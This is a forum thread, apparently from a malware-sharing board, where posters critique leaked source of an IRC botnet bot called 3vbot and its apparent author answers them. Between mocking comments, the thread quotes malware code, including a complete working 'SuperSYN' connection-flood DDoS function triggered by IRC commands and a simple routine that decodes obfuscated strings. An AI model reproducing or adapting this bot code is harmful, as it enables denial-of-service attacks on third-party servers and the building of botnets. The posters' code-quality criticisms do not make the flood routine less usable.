Thread: 3vbot v1.4 source

WARNING: THIS IS THE MOST ABSOLUTE WORST PIECE OF SHIT EVER CREATED!!

This is a great example of how NOT to code.

"HF's number #1 irc bot" - lol

pass:

Code:

opensc.ws

Is this your leak? or was it leaked somewhere else first?

Originally Posted by zyklon

Is this your leak? or was it leaked somewhere else first?

someone sent me it, so I decided to post it and no it wasn't leaked somewhere else first

its fine to state your opinion (shitty), but can you explain why (for us non bot-savvy people [who don't know C]).

I had a quick look throught it and didn't really see anything "Shitty" but like Cracksman I am not C coder and wouldn't know what you guys classify as "Shitty"

Originally Posted by cracksman

its fine to state your opinion (shitty), but can you explain why (for us non bot-savvy people [who don't know C]).

well for one, absolutely no error handling was used when calling api's. If you know c/c++ or have any coding background, it should be pretty obvious how many errors, and horrible methods that were used, not to mention the ugly coding style/layout.

its fine to state your opinion (shitty), but can you explain why (for us non bot-savvy people [who don't know C])

oh, lets take a look))) and by the way, it's not c, it's shitty C++...

Code:

fnIsWow64Process = (LPFN_ISWOW64PROCESS) GetProcAddress(GetModuleHandle("kernel32"),"IsWow64Process");
fnIsWow64Process(GetCurrentProcess(), &WoW);

always calling zero address at any OS before Windows XP SP2...

Code:

std::string decrypt(const char* ePtr) {
        int len = strlen(ePtr);
        char ret[128] = {0};
        strcpy(ret, ePtr);
        for (int i = 0; i < len; i++) {
                ret[i] = ret[i] - 25;
        }
        return ret;
}

damn, what a strong encryption algo...

Code:

API::~API( void ) {
	FreeLibrary(hKernel);
	FreeLibrary(hAdvapi);
	FreeLibrary(hWsock);
	FreeLibrary(hInet);
	FreeLibrary(hUrl);
	FreeLibrary(hShell);
	FreeLibrary(hUser32);
	FreeLibrary(hPsApi);
	FreeLibrary(hShlwapi);
	return;
}

oh, that's funny... seems like author doesn't actually knows what he is doing... FreeLibrary on kernel32.dll is epic... and even return at the end of destructor is funny...

Code:

DWORD API::GetFileSize(string file) {
	if (!API::fileExists(file))
		return -1;
	else {
		API::LARGE_INTEGER n;
		HANDLE hfile = API::CreateFileA(file.c_str(), GENERIC_READ, FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
		if (API::GetFileSizeEx(hfile, &n) != 0) {
			return n.LowPart;
		} else {
			return -2;
		}
	}
}

author is releasing loaded dll, that she shouldn't do, and on the other hand author never closes opened files... dumbass... returning -2 (actually 0xFFFFFFFE) on error is funny too...

it's copy-pasted to death, just look at IRC.CPP, in one function he uses stl functions when parsing some text, and in the next funtion he uses standard c functions like strtok, i bet he didn't even write a single function himself, just copy-pasted, changed variable names, functions names, added his own winapi wrapper (if it's even worth be called that)

and look at the SSYN, made me chuckle a bit, it's not every day you see a SYN FLOOD, or well, a SUPER SYN FLOOD, using connect(), impressive

and lol at the duped code

Code:

int IRC::CMDDDoSSYN(string ip, string port, int time) {
	if (ip == "" || port == "") {
		return(IRCSend(IRC_MSG, servers[currserver].channel, MSG_DDOS_ERRONEOUS));
	}
	int ssynDelay			=	100;
	SOCKADDR_IN			    SockAddr;
	SOCKET					sock[SUPERSYN_SOCKETS];
   	IN_ADDR					iaddr;
	LPHOSTENT lpHostEntry	= NULL;
 	DWORD mode = 1;
	int c = 0, i = 0;
	shouldDDoS = true;

	unsigned long targetIP = api->inet_addr(ip.c_str());
	unsigned short targetPort = (unsigned short)atoi(port.c_str());

	if (targetIP == INADDR_NONE) {
		/*hostent *pHE = api->gethostbyname(targetIP);
		if (pHE == 0)
			return INADDR_NONE;
		IP = *((unsigned long *)pHE->h_addr_list[0]);*/
		IRCSend(IRC_MSG, servers[currserver].channel, MSG_DDOS_NETFAIL);
		return 0;
	}

	memset(&SockAddr, 0, sizeof(SockAddr));
	SockAddr.sin_family =	AF_INET;
   	SockAddr.sin_port = api->htons(targetPort);
	iaddr.s_addr = targetIP;
	SockAddr.sin_addr = iaddr; //ip addy
	
	char buff[1024] = "\0";
	api->wsprintf(buff, "%s IP %s Port %s for %d seconds.", MSG_DDOS_DDOSING, ip.c_str(), port.c_str(), time);
	IRCSend(IRC_MSG, servers[currserver].channel, buff);
	DWORD begin = api->GetTickCount();
	if (time > 0) {
		while (((api->GetTickCount() - begin) / 1000) < time && shouldDDoS) {
			for (c = 0; c < SUPERSYN_SOCKETS; c++) {
				sock[c] = api->socket(AF_INET, SOCK_STREAM, 0);
   				if (sock[c] == INVALID_SOCKET)
      					continue;
				api->ioctlsocket(sock[c], FIONBIO, &mode);
			}
			for (c = 0; c < SUPERSYN_SOCKETS; c++)
  				api->connect(sock[c], (PSOCKADDR) &SockAddr, sizeof(SockAddr));
      			api->Sleep(ssynDelay);
			for (c = 0; c < SUPERSYN_SOCKETS; c++)
				api->closesocket(sock[c]); //close sockets
		}
	} else if (time == 0) {
		while (shouldDDoS) {
			for (c = 0; c < SUPERSYN_SOCKETS; c++) {
				sock[c] = api->socket(AF_INET, SOCK_STREAM, 0);
   				if (sock[c] == INVALID_SOCKET)
      					continue;
				api->ioctlsocket(sock[c], FIONBIO, &mode);
			}
			for (c = 0; c < SUPERSYN_SOCKETS; c++)
  				api->connect(sock[c], (PSOCKADDR) &SockAddr, sizeof(SockAddr));
      			api->Sleep(ssynDelay);
			for (c = 0; c < SUPERSYN_SOCKETS; c++)
				api->closesocket(sock[c]); //close sockets
		}
	}
	return(shouldDDoS ? IRCSend(IRC_MSG, servers[currserver].channel, MSG_DDOS_COMPLETE) : 0);
}

K I didn't see them But I noticed the comment on Returning -2 as the Return data type is a Dword, I actually dont see anything wrong with that and allows for more than just true or false(1 or 0) so $FFFFFFFE and $FFFFFFFD based on -1 or -2 return, yeah it is different and I can't say I have seen what should be a basic boolean returned as a Dword. And assuming the variable hKernel is actually the handle to the Kernel32.dll is also very strange or maybe he knows some we don't?

@ _v0id,

I am really not going to take time to value your existence by commenting on the bold red sentence of yours. You were always obsessed with me, working against me and trashing me even when I didn't know who you are, even when we hadn't even talked once.

@ everybody else,

Thanks for the input, no matter its nature or intent. I am not going to start making excuses about any of your findings, there's no reason to.. For a couple of reasons. For one, there's no reason to fanatically defend it. Simply, it served its purpose, there's nothing to gain from defending it. And secondly, this was actually my first project. Well, the first project that I actually sticked to for months.

Regarding the accusations on the C/P IRC.CPP, I was kinda startled. It's actually not C/P. Really, I mean it. The reason for the different techniques is because simply at the time I did not have solid knowledge and techniques, and since I jumped directly into C++ and did not go with C first (huge mistake from what I later found out), I ended up mixing them big time. There are mistakes in the code. Some, horrible. I've heard feedback from elsewhere too. And there're probably more where that came from. I'm not ashamed of that. I took the time to learn from it, and I still do by reading feedback from anyone who reviews the code.

That's what I had to say.. I hope it clarifies a few things.